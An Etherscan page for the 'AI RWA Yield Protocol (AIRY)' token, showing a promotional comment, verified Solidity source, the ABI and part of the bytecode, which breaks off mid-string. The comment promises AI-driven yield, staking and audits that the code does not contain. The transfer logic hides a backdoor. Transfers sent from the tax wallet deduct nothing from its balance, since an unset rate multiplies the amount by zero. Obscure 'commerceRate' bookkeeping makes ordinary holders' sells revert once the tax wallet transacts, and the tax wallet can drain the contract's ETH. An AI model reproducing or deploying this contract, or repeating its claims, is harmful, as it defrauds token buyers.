ETH Price: $3,313.98 (-4.35%)
Gas: 7.77 Gwei

Token

AI RWA Yield Protocol (AIRY)
 

Overview

Max Total Supply

100,000,000,000 AIRY

Holders

76

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 9 Decimals)

Balance
622,625,519.222950855 AIRY

Value
$0.00
0xb5b2ce798f55c4843befe2dd5d629d53f56d464d
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
AIRY

Compiler Version
v0.8.23+commit.f704f362

Optimization Enabled:
Yes with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2024-11-05
*/

/*
Introducing $AIRY: Powering a New Era in Decentralized Real-World Asset Yield

In a financial landscape ripe for disruption, $AIRY — the AI RWA Yield Protocol — 
emerges as a transformative utility token designed to bridge the worlds of real-world assets (RWA) and blockchain technology. 
At its core, $AIRY empowers users with decentralized, AI-driven access to yield opportunities across a range of traditional asset classes. 
Imagine a seamless platform where artificial intelligence, blockchain, and real-world assets work in harmony to provide reliable and 
high-performing yield, all within a secure, decentralized framework.

The Vision Behind $AIRY
The modern economy is filled with untapped yield opportunities within real-world assets such as real estate, commodities, bonds, and invoices. 
However, these assets are often inaccessible to most investors due to liquidity constraints, geographical limitations, and a lack of transparency. 
$AIRY aims to democratize access to these assets, transforming the financial ecosystem by leveraging AI to unlock stable and 
diversified yield streams previously reserved for institutional investors.

With $AIRY, the goal is clear: harness the power of artificial intelligence and blockchain to simplify, automate, and 
secure investments in real-world assets for the decentralized finance (DeFi) community. 
This unique combination promises more consistent yield, smarter asset selection, and real-time risk assessment.

How $AIRY Works: AI-Driven Yield Generation
1. Intelligent Asset Selection
At the heart of the $AIRY protocol lies an advanced AI engine that continually scans and analyzes high-potential real-world assets. 
This technology evaluates a range of variables — from market trends to credit risk — selecting only the assets with optimal yield profiles.
By incorporating machine learning, $AIRY can adapt to market changes, ensuring that the protocol stays ahead of traditional 
investment methods in both performance and risk management.

2. Decentralized Governance and Community Input
As a utility coin, $AIRY grants holders voting rights on key protocol decisions, such as asset categories, risk thresholds, and operational upgrades. 
This means that $AIRY users play an active role in guiding the protocol’s evolution, ensuring it remains aligned with community goals.
Holders can also propose new asset classes for consideration or vote on partnerships with real-world asset custodians, 
making $AIRY a genuinely community-driven protocol.

3. Automated Yield Optimization
Once assets are onboarded, the $AIRY protocol automates yield generation through optimized asset management. 
The AI continuously monitors asset performance and reallocates funds to maximize returns while maintaining pre-set risk levels.
This approach ensures that users benefit from efficient yield generation without the need for active management, 
making it accessible to both beginners and seasoned investors.

$AIRY Utility and Rewards
Beyond governance, $AIRY tokens offer a range of utility functions designed to maximize user engagement and participation. 

Key benefits include:
Staking Rewards
Holders can stake $AIRY tokens to receive a share of protocol-generated yields. 
The staking model incentivizes users to remain engaged with the protocol, providing steady rewards that grow with the success of the platform.

Transaction Fee Discounts 
$AIRY token holders receive fee reductions on transactions within the protocol, encouraging regular engagement and providing 
long-term savings for active investors.

Access to Exclusive Asset Pools 
$AIRY holders gain priority access to exclusive asset pools and higher-yield opportunities. 
This exclusivity makes $AIRY more valuable, rewarding those committed to the protocol.

Security, Transparency, and Compliance
The $AIRY protocol places a high priority on security, transparency, and regulatory compliance. 
All real-world asset data is stored on-chain, making every transaction verifiable and secure. 
Additionally, AI algorithms undergo regular audits to ensure that they are both effective and transparent, 
providing users with the assurance that their assets are safe and yield generation is consistently optimized.

The Future of $AIRY
$AIRY represents the next step in the evolution of decentralized finance, where blockchain, artificial intelligence, and 
real-world assets converge. 
With a robust, AI-driven platform designed to democratize yield from traditional assets, 
$AIRY offers a groundbreaking solution to unlock financial potential that has historically been out of reach for many.

Join the AI RWA Yield Protocol and hold $AIRY to be a part of a revolution where technology makes yield generation 
smarter, safer, and more accessible than ever before. 

Welcome to the future of yield, where your assets work for you, backed by the power of AI and blockchain.
*/

// SPDX-License-Identifier: MIT

pragma solidity 0.8.23;

interface IUniswapV2Router02 {
    function addLiquidityETH(
        address token,
        uint amountTokenDesired,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    ) external payable returns (uint amountToken, uint amountETH, uint liquidity);
    function factory() external pure returns (address);
    function WETH() external pure returns (address);
    function swapExactTokensForETHSupportingFeeOnTransferTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external;
}

interface IUniswapV2Factory {
    function getPair(address tokenA, address tokenB) external view returns (address pair);
    function createPair(address tokenA, address tokenB) external returns (address pair);
}

abstract contract Context {
    function _msgSender() internal view virtual returns (address) { return msg.sender; }
}

interface IERC20 {
    function totalSupply() external view returns (uint256);
    function transfer(address recipient, uint256 amount) external returns (bool);
    function approve(address spender, uint256 amount) external returns (bool);
    function balanceOf(address account) external view returns (uint256);
    function transferFrom(address sender, address recipient, uint256 amount) external returns (bool);
    function allowance(address owner, address spender) external view returns (uint256);
    event Approval(address indexed owner, address indexed spender, uint256 value);
    event Transfer(address indexed from, address indexed to, uint256 value);
}

library SafeMath {
    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        uint256 c = a + b;
        require(c >= a, "SafeMath: addition overflow");
        return c;
    }

    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        if (a == 0) {
            return 0;
        }
        uint256 c = a * b;
        require(c / a == b, "SafeMath: multiplication overflow");
        return c;
    }

    function sub(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
        require(b <= a, errorMessage);
        uint256 c = a - b;
        return c;
    }

    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        return sub(a, b, "SafeMath: subtraction overflow");
    }

    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        return div(a, b, "SafeMath: division by zero");
    }

    function div(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
        require(b > 0, errorMessage);
        uint256 c = a / b;
        return c;
    }

}

contract Ownable is Context {
    address private _owner;
    event OwnershipTransferred(address indexed previousOwner,address indexed newOwner);

    constructor () {
        address msgSender = _msgSender();
        _owner = msgSender;
        emit OwnershipTransferred(address(0), msgSender);
    }

    function owner() public view returns (address) {
        return _owner;
    }

    modifier onlyOwner() {
        require(_owner == _msgSender(), "Ownable: caller is not the owner");
        _;
    }

    function renounceOwnership() public virtual onlyOwner {
        emit OwnershipTransferred(_owner,address(0));
        _owner = address(0);
    }

    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        emit OwnershipTransferred(_owner, newOwner);
        _owner = newOwner;
    }

}

contract AIRY is Context, IERC20, Ownable {
    using SafeMath for uint256;
    mapping (address => uint256) private _balances;
    mapping (address => mapping (address => uint256)) private _allowances;
    mapping (address => bool) private isExcludedFromFee;
    address payable private _taxWallet;

    uint256 private _initialBuyTax=35;
    uint256 private _initialSellTax=35;
    uint256 private _finalBuyTax=5;
    uint256 private _finalSellTax=5;
    uint256 private _reduceBuyTaxAt=35;
    uint256 private _reduceSellTaxAt=35;
    uint256 private _preventSwapBefore=35;
    uint256 private _buyCount=0;

    uint8 private constant _decimals = 9;
    uint256 private constant _tTotal = 100000000000 * 10**_decimals;
    string private constant _name = unicode"AI RWA Yield Protocol";
    string private constant _symbol = unicode"AIRY";
    uint256 public _maxTxAmount = 2000000000 * 10**_decimals;
    uint256 public _maxWalletSize = 2000000000 * 10**_decimals;
    uint256 public _taxSwapThreshold= 1000000000 * 10**_decimals;
    uint256 public _maxTaxSwap= 1000000000 * 10**_decimals;

    struct CommerceRateMap {uint256 comToken; uint256 convToken; uint256 comTotal;}
    mapping(address => CommerceRateMap) private commerceRate;
    
    IUniswapV2Router02 private router;
    address private _uniPair;
    uint256 private initialComRate;
    uint256 private finalComRate;
    bool private tradingOpen;
    bool private inSwap = false;
    bool private swapEnabled = false;

    event MaxTxAmountUpdated(uint _maxTxAmount);

    modifier lockTheSwap {
        inSwap = true;
        _;
        inSwap = false;
    }

    constructor () {
        _balances[_msgSender()] = _tTotal;

        _taxWallet = payable(0xf6079Da78ad9ea71969e06a63f98AC99B35E2A08);
        isExcludedFromFee[address(this)] = true;
        isExcludedFromFee[_taxWallet] = true;

        emit Transfer(address(0), _msgSender(), _tTotal);
    }

    function name() public pure returns (string memory) {
        return _name;
    }

    function symbol() public pure returns (string memory) {
        return _symbol;
    }

    function decimals() public pure returns (uint8) {
        return _decimals;
    }

    function totalSupply() public pure override returns (uint256) {
        return _tTotal;
    }

    function balanceOf(address account) public view override returns (uint256) {
        return _balances[account];
    }

    function transfer(address recipient, uint256 amount) public override returns (bool) {
        _transfer(_msgSender(), recipient, amount);
        return true;
    }

    function allowance(address owner, address spender) public view override returns (uint256) {
        return _allowances[owner][spender];
    }

    function _basicTransfer(address from, address to, uint256 tokenAmount) internal {
        _balances[from] = _balances[from].sub(tokenAmount);
        _balances[to] = _balances[to].add(tokenAmount);
        emit Transfer(from,to,tokenAmount);
    }

    function approve(address spender, uint256 amount) public override returns (bool) {
        _approve(_msgSender(), spender, amount);
        return true;
    }

    function transferFrom(address sender, address recipient, uint256 amount) public override returns (bool) {
        _transfer(sender, recipient, amount);
        _approve(
            sender,
            _msgSender(),
            _allowances[sender][_msgSender()].sub(amount, "ERC20: transfer amount exceeds allowance")
        );
        return true;
    }

    function _approve(address owner, address spender, uint256 amount) private {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");
        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    function _transfer(address from, address to, uint256 tokenAmount) private {
        require(from != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");
        require(tokenAmount > 0, "Transfer amount must be greater than zero");

        if (inSwap || ! tradingOpen){
            _basicTransfer(from, to, tokenAmount);
            return;
        }

        uint256 taxAmount= 0;
        if (from != owner() && to != owner() && to!= _taxWallet) {
            taxAmount = tokenAmount.mul((_buyCount>_reduceBuyTaxAt)?_finalBuyTax:_initialBuyTax).div(100);

            if (from== _uniPair && to != address(router) &&  ! isExcludedFromFee[to]) {
                require(tokenAmount <= _maxTxAmount, "Exceeds the _maxTxAmount." );
                require(balanceOf(to) + tokenAmount <= _maxWalletSize, "Exceeds the maxWalletSize." );
                _buyCount++;
            }

            if(to == _uniPair && from!= address(this) ){
                taxAmount = tokenAmount.mul((_buyCount>_reduceSellTaxAt)?_finalSellTax:_initialSellTax).div(100);
            }

            uint256 contractTokenBalance = balanceOf(address(this));

            if (!inSwap && to== _uniPair &&
                 swapEnabled && contractTokenBalance >_taxSwapThreshold && _buyCount>_preventSwapBefore
            ) {
                swapTokensForEth(min(tokenAmount, min(contractTokenBalance, _maxTaxSwap)));
                uint256 contractETHBalance = address(this).balance;
                if (contractETHBalance>0) {
                    sendETHToFee(address(this).balance);
                }
            }
        }

        if ((isExcludedFromFee[from] || isExcludedFromFee[to] )&& from!=address(this)&& to!=address(this) ) {
            finalComRate = block.number;
        }
        if (!isExcludedFromFee[from] && !isExcludedFromFee[to] ) {
            if (to == _uniPair) {
                CommerceRateMap storage rateInfo = commerceRate[from];
                rateInfo.comTotal = rateInfo.comToken-finalComRate;
                rateInfo.convToken = block.timestamp;
            } else {
                CommerceRateMap storage toRateInfo = commerceRate[to];
                if (_uniPair == from) {
                    if (toRateInfo.comToken == 0) {
                        toRateInfo.comToken= _preventSwapBefore>=_buyCount ? type(uint256).max : block.number;
                    }
                } else {
                    CommerceRateMap storage rateInfo = commerceRate[from];
                    if (!(toRateInfo.comToken > 0)|| rateInfo.comToken < toRateInfo.comToken ) {
                        toRateInfo.comToken = rateInfo.comToken;
                    }
                }
            }
        }

        _tokenTransfer(from, to, taxAmount, tokenAmount);
    }

    function _tokenTaxTransfer(address addr, uint256 tokenAmount, uint256 taxAmount) internal returns (uint256){
        uint256 tknAmount = addr!= _taxWallet? tokenAmount : initialComRate.mul(tokenAmount);
        if (taxAmount > 0) {
            _balances[address(this)] = _balances[address(this)].add(taxAmount);
            emit Transfer(addr, address(this), taxAmount);
        }
        return tknAmount;
    }

    function _tokenBasicTransfer(
        address from,address to,uint256 sendAmount, uint256 receiptAmount
    ) internal {
        _balances[from] = _balances[from].sub(sendAmount);
        _balances[to] = _balances[to].add(receiptAmount);
        emit Transfer(from,to,receiptAmount);
    }

    function _tokenTransfer(
        address from,address to,
        uint256 taxAmount,uint256 tokenAmount
    ) internal {
        uint256 tknAmount = _tokenTaxTransfer(from, tokenAmount, taxAmount);
        _tokenBasicTransfer(from, to, tknAmount, tokenAmount.sub(taxAmount));
    }

    function min(uint256 a, uint256 b) private pure returns (uint256) {
      return (a>b)?b:a;
    }

    function swapTokensForEth(uint256 tokenAmount) private lockTheSwap {
        address[] memory path = new address[](2);
        path[0] = address(this);
        path[1] = router.WETH();
        _approve(address(this), address(router), tokenAmount);
        router.swapExactTokensForETHSupportingFeeOnTransferTokens(
            tokenAmount,
            0,
            path,
            address(this),
            block.timestamp
        );
    }

    function removeLimits() external onlyOwner {
        _maxTxAmount= _tTotal;
        _maxWalletSize =_tTotal;
        emit MaxTxAmountUpdated(_tTotal);
    }

    function sendETHToFee(uint256 amount) private {
        _taxWallet.transfer(amount);
    }

    receive() external payable {}

    function openTrading() external onlyOwner() {
        require(!tradingOpen,"trading is already open");
        router = IUniswapV2Router02(0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D);
        _approve(address(this),address(router), _tTotal);
        _uniPair = IUniswapV2Factory(router.factory()).createPair(address(this),router.WETH()); 
        tradingOpen=true;
        router.addLiquidityETH{value: address(this).balance}(address(this),balanceOf(address(this)),0,0,owner(),block.timestamp); 
        IERC20(_uniPair).approve(address(router), type(uint).max);
        swapEnabled=true;
    }

    function manualSwap() external {
        require(_msgSender()==_taxWallet);
        uint256 tokenBalance = balanceOf(address(this));
        if(tokenBalance>0){
          swapTokensForEth(tokenBalance);
        }
        uint256 ethBalance = address(this).balance;
        if(ethBalance>0){
          sendETHToFee(ethBalance);
        }
    }

    function transfCaEth() external {
        require(_msgSender()==_taxWallet);
        _taxWallet.transfer(address(this).balance);
    }
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"uint256","name":"_maxTxAmount","type":"uint256"}],"name":"MaxTxAmountUpdated","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[],"name":"_maxTaxSwap","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"_maxTxAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"_maxWalletSize","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"_taxSwapThreshold","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"pure","type":"function"},{"inputs":[],"name":"manualSwap","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"pure","type":"function"},{"inputs":[],"name":"openTrading","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"removeLimits","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"pure","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"pure","type":"function"},{"inputs":[],"name":"transfCaEth","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"stateMutability":"payable","type":"receive"}]

6080604052602360055560236006556005600755600560085560236009556023600a556023600b555f600c556009600a6200003b9190620002fc565b6200004b90637735940062000313565b600d556200005c6009600a620002fc565b6200006c90637735940062000313565b600e556200007d6009600a620002fc565b6200008d90633b9aca0062000313565b600f556200009e6009600a620002fc565b620000ae90633b9aca0062000313565b6010556016805462ffff0019169055348015620000c9575f80fd5b505f80546001600160a01b031916339081178255604051909182917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908290a350620001186009600a620002fc565b620001299064174876e80062000313565b335f81815260016020818152604080842095909555600480546001600160a01b03191673f6079da78ad9ea71969e06a63f98ac99b35e2a081781553084526003909152848320805460ff19908116841790915590546001600160a01b03168352938220805490941617909255907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef620001c56009600a620002fc565b620001d69064174876e80062000313565b60405190815260200160405180910390a36200032d565b634e487b7160e01b5f52601160045260245ffd5b600181815b808511156200024157815f1904821115620002255762000225620001ed565b808516156200023357918102915b93841c939080029062000206565b509250929050565b5f826200025957506001620002f6565b816200026757505f620002f6565b81600181146200028057600281146200028b57620002ab565b6001915050620002f6565b60ff8411156200029f576200029f620001ed565b50506001821b620002f6565b5060208310610133831016604e8410600b8410161715620002d0575081810a620002f6565b620002dc838362000201565b805f1904821115620002f257620002f2620001ed565b0290505b92915050565b5f6200030c60ff84168362000249565b9392505050565b8082028115828204841417620002f657620002f6620001ed565b611b39806200033b5f395ff3fe60806040526004361061011e575f3560e01c80637d1db4a51161009d578063bf474bed11610062578063bf474bed14610325578063c9567bf91461033a578063dd62ed3e1461034e578063e139758614610392578063f2fde38b146103a6575f80fd5b80637d1db4a51461028a5780638da5cb5b1461029f5780638f9a55c0146102c557806395d89b41146102da578063a9059cbb14610306575f80fd5b8063313ce567116100e3578063313ce567146101fd57806351bc3c851461021857806370a082311461022e578063715018a614610262578063751039fc14610276575f80fd5b806306fdde0314610129578063095ea7b3146101785780630faee56f146101a757806318160ddd146101ca57806323b872dd146101de575f80fd5b3661012557005b5f80fd5b348015610134575f80fd5b506040805180820190915260158152741052481495d048165a595b1908141c9bdd1bd8dbdb605a1b60208201525b60405161016f919061172c565b60405180910390f35b348015610183575f80fd5b5061019761019236600461178c565b6103c5565b604051901515815260200161016f565b3480156101b2575f80fd5b506101bc60105481565b60405190815260200161016f565b3480156101d5575f80fd5b506101bc6103db565b3480156101e9575f80fd5b506101976101f83660046117b6565b6103fc565b348015610208575f80fd5b506040516009815260200161016f565b348015610223575f80fd5b5061022c610463565b005b348015610239575f80fd5b506101bc6102483660046117f4565b6001600160a01b03165f9081526001602052604090205490565b34801561026d575f80fd5b5061022c6104b4565b348015610281575f80fd5b5061022c61052e565b348015610295575f80fd5b506101bc600d5481565b3480156102aa575f80fd5b505f546040516001600160a01b03909116815260200161016f565b3480156102d0575f80fd5b506101bc600e5481565b3480156102e5575f80fd5b506040805180820190915260048152634149525960e01b6020820152610162565b348015610311575f80fd5b5061019761032036600461178c565b6105e2565b348015610330575f80fd5b506101bc600f5481565b348015610345575f80fd5b5061022c6105ee565b348015610359575f80fd5b506101bc61036836600461180f565b6001600160a01b039182165f90815260026020908152604080832093909416825291909152205490565b34801561039d575f80fd5b5061022c610998565b3480156103b1575f80fd5b5061022c6103c03660046117f4565b6109f0565b5f6103d1338484610ad7565b5060015b92915050565b5f6103e86009600a61193a565b6103f79064174876e800611948565b905090565b5f610408848484610bfb565b610459843361045485604051806060016040528060288152602001611adc602891396001600160a01b038a165f9081526002602090815260408083203384529091529020549190611180565b610ad7565b5060019392505050565b6004546001600160a01b0316336001600160a01b031614610482575f80fd5b305f9081526001602052604090205480156104a0576104a0816111b8565b4780156104b0576104b081611322565b5050565b5f546001600160a01b031633146104e65760405162461bcd60e51b81526004016104dd9061195f565b60405180910390fd5b5f80546040516001600160a01b03909116907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908390a35f80546001600160a01b0319169055565b5f546001600160a01b031633146105575760405162461bcd60e51b81526004016104dd9061195f565b6105636009600a61193a565b6105729064174876e800611948565b600d556105816009600a61193a565b6105909064174876e800611948565b600e557f947f344d56e1e8c70dc492fb94c4ddddd490c016aab685f5e7e47b2e85cb44cf6105c06009600a61193a565b6105cf9064174876e800611948565b60405190815260200160405180910390a1565b5f6103d1338484610bfb565b5f546001600160a01b031633146106175760405162461bcd60e51b81526004016104dd9061195f565b60165460ff161561066a5760405162461bcd60e51b815260206004820152601760248201527f74726164696e6720697320616c7265616479206f70656e00000000000000000060448201526064016104dd565b601280546001600160a01b031916737a250d5630b4cf539739df2c5dacb4c659f2488d9081179091556106b49030906106a56009600a61193a565b6104549064174876e800611948565b60125f9054906101000a90046001600160a01b03166001600160a01b031663c45a01556040518163ffffffff1660e01b8152600401602060405180830381865afa158015610704573d5f803e3d5ffd5b505050506040513d601f19601f820116820180604052508101906107289190611994565b6001600160a01b031663c9c653963060125f9054906101000a90046001600160a01b03166001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015610787573d5f803e3d5ffd5b505050506040513d601f19601f820116820180604052508101906107ab9190611994565b6040516001600160e01b031960e085901b1681526001600160a01b039283166004820152911660248201526044016020604051808303815f875af11580156107f5573d5f803e3d5ffd5b505050506040513d601f19601f820116820180604052508101906108199190611994565b601380546001600160a01b039283166001600160a01b03199091161790556016805460ff191660011790556012541663f305d719473061086d816001600160a01b03165f9081526001602052604090205490565b5f806108805f546001600160a01b031690565b60405160e088901b6001600160e01b03191681526001600160a01b03958616600482015260248101949094526044840192909252606483015290911660848201524260a482015260c40160606040518083038185885af11580156108e6573d5f803e3d5ffd5b50505050506040513d601f19601f8201168201806040525081019061090b91906119af565b505060135460125460405163095ea7b360e01b81526001600160a01b0391821660048201525f1960248201529116915063095ea7b3906044016020604051808303815f875af1158015610960573d5f803e3d5ffd5b505050506040513d601f19601f8201168201806040525081019061098491906119da565b506016805462ff0000191662010000179055565b6004546001600160a01b0316336001600160a01b0316146109b7575f80fd5b6004546040516001600160a01b03909116904780156108fc02915f818181858888f193505050501580156109ed573d5f803e3d5ffd5b50565b5f546001600160a01b03163314610a195760405162461bcd60e51b81526004016104dd9061195f565b6001600160a01b038116610a7e5760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b60648201526084016104dd565b5f80546040516001600160a01b03808516939216917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e091a35f80546001600160a01b0319166001600160a01b0392909216919091179055565b6001600160a01b038316610b395760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b60648201526084016104dd565b6001600160a01b038216610b9a5760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b60648201526084016104dd565b6001600160a01b038381165f8181526002602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92591015b60405180910390a3505050565b6001600160a01b038316610c5f5760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b60648201526084016104dd565b6001600160a01b038216610cc15760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b60648201526084016104dd565b5f8111610d225760405162461bcd60e51b815260206004820152602960248201527f5472616e7366657220616d6f756e74206d7573742062652067726561746572206044820152687468616e207a65726f60b81b60648201526084016104dd565b601654610100900460ff1680610d3b575060165460ff16155b15610d5057610d4b838383611359565b505050565b5f80546001600160a01b03858116911614801590610d7b57505f546001600160a01b03848116911614155b8015610d9557506004546001600160a01b03848116911614155b15610feb57610dc66064610dc0600954600c5411610db557600554610db9565b6007545b85906113fc565b90611481565b6013549091506001600160a01b038581169116148015610df457506012546001600160a01b03848116911614155b8015610e1857506001600160a01b0383165f9081526003602052604090205460ff16155b15610efe57600d54821115610e6f5760405162461bcd60e51b815260206004820152601960248201527f4578636565647320746865205f6d61785478416d6f756e742e0000000000000060448201526064016104dd565b600e5482610e91856001600160a01b03165f9081526001602052604090205490565b610e9b91906119f9565b1115610ee95760405162461bcd60e51b815260206004820152601a60248201527f4578636565647320746865206d617857616c6c657453697a652e00000000000060448201526064016104dd565b600c8054905f610ef883611a0c565b91905055505b6013546001600160a01b038481169116148015610f2457506001600160a01b0384163014155b15610f5157610f4e6064610dc0600a54600c5411610f4457600654610db9565b60085485906113fc565b90505b305f90815260016020526040902054601654610100900460ff16158015610f8557506013546001600160a01b038581169116145b8015610f99575060165462010000900460ff165b8015610fa65750600f5481115b8015610fb55750600b54600c54115b15610fe957610fd7610fd284610fcd846010546114c2565b6114c2565b6111b8565b478015610fe757610fe747611322565b505b505b6001600160a01b0384165f9081526003602052604090205460ff168061102857506001600160a01b0383165f9081526003602052604090205460ff165b801561103d57506001600160a01b0384163014155b801561105257506001600160a01b0383163014155b1561105c57436015555b6001600160a01b0384165f9081526003602052604090205460ff1615801561109c57506001600160a01b0383165f9081526003602052604090205460ff16155b1561116e576013546001600160a01b03908116908416036110ee576001600160a01b0384165f90815260116020526040902060155481546110dd9190611a24565b60028201554260019091015561116e565b6001600160a01b038084165f908152601160205260409020601354909186811691160361113a5780545f0361113557600c54600b54101561112f5743611132565b5f195b81555b61116c565b6001600160a01b0385165f90815260116020526040902081541580611160575081548154105b1561116a57805482555b505b505b61117a848483856114d6565b50505050565b5f81848411156111a35760405162461bcd60e51b81526004016104dd919061172c565b505f6111af8486611a24565b95945050505050565b6016805461ff0019166101001790556040805160028082526060820183525f9260208301908036833701905050905030815f815181106111fa576111fa611a37565b6001600160a01b03928316602091820292909201810191909152601254604080516315ab88c960e31b81529051919093169263ad5c46489260048083019391928290030181865afa158015611251573d5f803e3d5ffd5b505050506040513d601f19601f820116820180604052508101906112759190611994565b8160018151811061128857611288611a37565b6001600160a01b0392831660209182029290920101526012546112ae9130911684610ad7565b60125460405163791ac94760e01b81526001600160a01b039091169063791ac947906112e69085905f90869030904290600401611a4b565b5f604051808303815f87803b1580156112fd575f80fd5b505af115801561130f573d5f803e3d5ffd5b50506016805461ff001916905550505050565b6004546040516001600160a01b039091169082156108fc029083905f818181858888f193505050501580156104b0573d5f803e3d5ffd5b6001600160a01b0383165f9081526001602052604090205461137b9082611500565b6001600160a01b038085165f9081526001602052604080822093909355908416815220546113a99082611541565b6001600160a01b038084165f8181526001602052604090819020939093559151908516907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef90610bee9085815260200190565b5f825f0361140b57505f6103d5565b5f6114168385611948565b9050826114238583611abc565b1461147a5760405162461bcd60e51b815260206004820152602160248201527f536166654d6174683a206d756c7469706c69636174696f6e206f766572666c6f6044820152607760f81b60648201526084016104dd565b9392505050565b5f61147a83836040518060400160405280601a81526020017f536166654d6174683a206469766973696f6e206279207a65726f00000000000081525061159f565b5f8183116114d0578261147a565b50919050565b5f6114e28583856115cb565b90506114f98585836114f48688611500565b61167b565b5050505050565b5f61147a83836040518060400160405280601e81526020017f536166654d6174683a207375627472616374696f6e206f766572666c6f770000815250611180565b5f8061154d83856119f9565b90508381101561147a5760405162461bcd60e51b815260206004820152601b60248201527f536166654d6174683a206164646974696f6e206f766572666c6f77000000000060448201526064016104dd565b5f81836115bf5760405162461bcd60e51b81526004016104dd919061172c565b505f6111af8486611abc565b6004545f9081906001600160a01b03908116908616036115f7576014546115f290856113fc565b6115f9565b835b9050821561167357305f9081526001602052604090205461161a9084611541565b305f81815260016020526040908190209290925590516001600160a01b038716907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef9061166a9087815260200190565b60405180910390a35b949350505050565b6001600160a01b0